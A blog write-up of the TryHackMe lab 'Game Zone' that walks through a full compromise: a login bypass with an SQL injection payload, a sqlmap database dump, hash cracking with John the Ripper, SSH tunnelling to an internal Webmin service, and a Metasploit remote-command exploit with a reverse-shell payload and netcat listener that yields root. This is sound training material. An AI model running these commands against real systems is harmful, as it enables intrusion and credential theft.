s1gn 1n subscr1b3

Hacking the Game Zone – SQLi, SSH Tunnels, and Root Access

Hacking the Game Zone – SQLi, SSH Tunnels, and Root Access

The TryHackMe room Game Zone was a great opportunity to revisit some fundamental offensive techniques in a very streamlined and accessible environment. Compared to some of the rooms I’ve completed recently (especially the one I tackled yesterday, which was notably more complex and time-consuming), this box was relatively easy and quick to get through. Still, it was packed with essential skills that are worth mastering and revisiting regularly.

This post walks through my approach step by step, explaining what I did, why I did it, and how each tool contributed to gaining full root access on the machine.

Full Port Scan and Surface Enumeration

To begin, I performed a comprehensive port scan using:

nmap -sC -sV -T4 -p- <target-IP>

This command enables script scanning (-sC), version detection (-sV), a faster timing template (-T4), and includes all 65,535 TCP ports (-p-). The goal here was to uncover not only the standard services but also any hidden or uncommon services that might be running on higher ports. Enumeration is a critical phase of any engagement, and skipping this step or doing it hastily can easily cause you to miss exploitable services.

The results were straightforward:

  • Port 22 (SSH) running OpenSSH 7.2p2
  • Port 80 (HTTP) hosting Apache 2.4.18

While this doesn’t look like much, it’s often all you need. A web server and SSH access can be enough to take full control if misconfigurations or vulnerabilities exist.

Web Recon and SQL Injection Discovery

Navigating to the web interface, I was met with a slick game-themed login page, clearly inspired by the Hitman series. There were no obvious navigation elements, and the page consisted almost entirely of a login prompt. I checked the source code, inspected network activity, and tried a few basic interactions to see how the form was structured.

Given the context and the way the form behaved (especially the way error messages were displayed), it was a strong candidate for SQL injection.

A bit later in the room, it was confirmed that the underlying SQL query was something like:

SELECT * FROM users WHERE username = :username AND password = :password

With this in mind, I tried classic bypass techniques such as:

  • Username: admin
  • Password: ' OR 1=1 --

And it worked. I was redirected to a new page (portal.php), confirming that SQL injection was possible.

Dumping the Database with SQLMap

At this point, I switched from manual testing to automation using one of my favorite tools: SQLMap.

If you haven’t used SQLMap before, it’s honestly one of the most powerful and time-saving tools available for SQL injection exploitation. It takes a single vulnerable request and systematically determines the injection point, DBMS type, enumerates databases, tables, and even dumps full credentials if available. The flexibility, power, and sheer number of features make SQLMap a must-have in any pentester's toolkit.

I captured the login POST request using Burp Suite, saved it as request.txt, and ran:

sqlmap -r request.txt --dbms=mysql --dump

SQLMap handled everything. It discovered the vulnerable parameter, confirmed the backend database was MySQL, and dumped the contents. In the users table, I found a hash:

  • Usernameagent47
  • Password hash: SHA256 format
  • Other table discoveredpost

Having a user account is only half the battle. Now I needed to crack that hash.

Cracking the Hash with JohnTheRipper

For cracking, I turned to JohnTheRipper, a reliable password cracker that’s especially effective when used with comprehensive wordlists like rockyou.txt.

I added the SHA256 hash to a file named hash.txt and ran:

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256

John quickly returned the cracked password:

  • Passwordvideogamer124

This gave me a complete set of valid SSH credentials:

ssh agent47@10.10.95.193

And I was in – logged in as a low-privileged user on the box.

Discovering a Service on a Blocked Port

After getting a shell, my next task was local enumeration. I wanted to see what was running on the system and what might be exposed internally.

I used:

ss -tulpn

This command shows all listening TCP and UDP sockets along with the associated processes. That’s when I saw something interesting: a service running on port 10000, but only bound to localhost. This meant it wasn’t accessible from the outside, possibly due to a firewall or binding restriction.

SSH Tunneling to Reach Internal Services

To access this internal service, I used SSH tunneling – a technique that allows you to forward ports from the target machine back to your local machine securely. I executed the following command from my AttackBox terminal:

ssh -L 10000:localhost:10000 agent47@10.10.95.193

This created a local port on my machine (localhost:10000) that redirected all traffic to the remote machine’s port 10000. Opening a browser and visiting http://localhost:10000 now connected me to the internal service.

What I found was Webmin – a web-based system administration interface. More importantly, it was running version 1.580, which is known to have a few historical remote command execution vulnerabilities.

Finding a Vulnerability in Webmin

I searched Exploit-DB and quickly came across this entry:

Webmin 1.580 - /file/show.cgi Remote Command Execution (Metasploit)

This vulnerability affects the exact version I found. It allows an authenticated user to execute arbitrary system commands via a crafted request to show.cgi.

Because I already had valid credentials, this exploit fit the situation perfectly.

Gaining Root Access with Metasploit

I launched Metasploit and configured the exploit module:

use exploit/unix/webapp/webmin_show_cgi_exec
set RHOSTS 127.0.0.1
set RPORT 10000
set SSL false
set USERNAME agent47
set PASSWORD videogamer124
set PAYLOAD cmd/unix/reverse
set LHOST <my AttackBox IP>
set LPORT 4444

I also started a Netcat listener to catch the shell:

nc -nlvp 4444

Then I launched the exploit:

run

A few seconds later, I received a reverse shell as root. This was possible because the Webmin process was running with elevated privileges.

Collecting the Final Flag

From the reverse shell, I confirmed access:

whoami

The output:

root

From there, I navigated to /root/ and collected the root flag:

cat /root/root.txt

Flag captured. Room complete.

Final Thoughts

Game Zone is a great example of how a chain of simple vulnerabilities can lead to full system compromise. While the room wasn’t particularly challenging compared to some of the others I’ve done recently, it was extremely satisfying and well-paced.

Here’s what made it especially valuable:

  • Repetition of SQL injection principles
  • Use of SQLMap – seriously, this tool is phenomenal. It automates enumeration, exploitation, and data extraction, and even handles things like tamper scripts, custom headers, and authentication.
  • Practical password cracking with JohnTheRipper
  • Hands-on experience with SSH tunneling to access restricted internal services
  • Real-world Webmin exploitation using Metasploit

In real environments, these attack paths are surprisingly common. Misconfigured admin panels, outdated packages, reused credentials, and weak internal isolation can create exactly this kind of scenario. The room makes for excellent practice and is perfect for beginners and intermediate learners alike.

Highly recommend.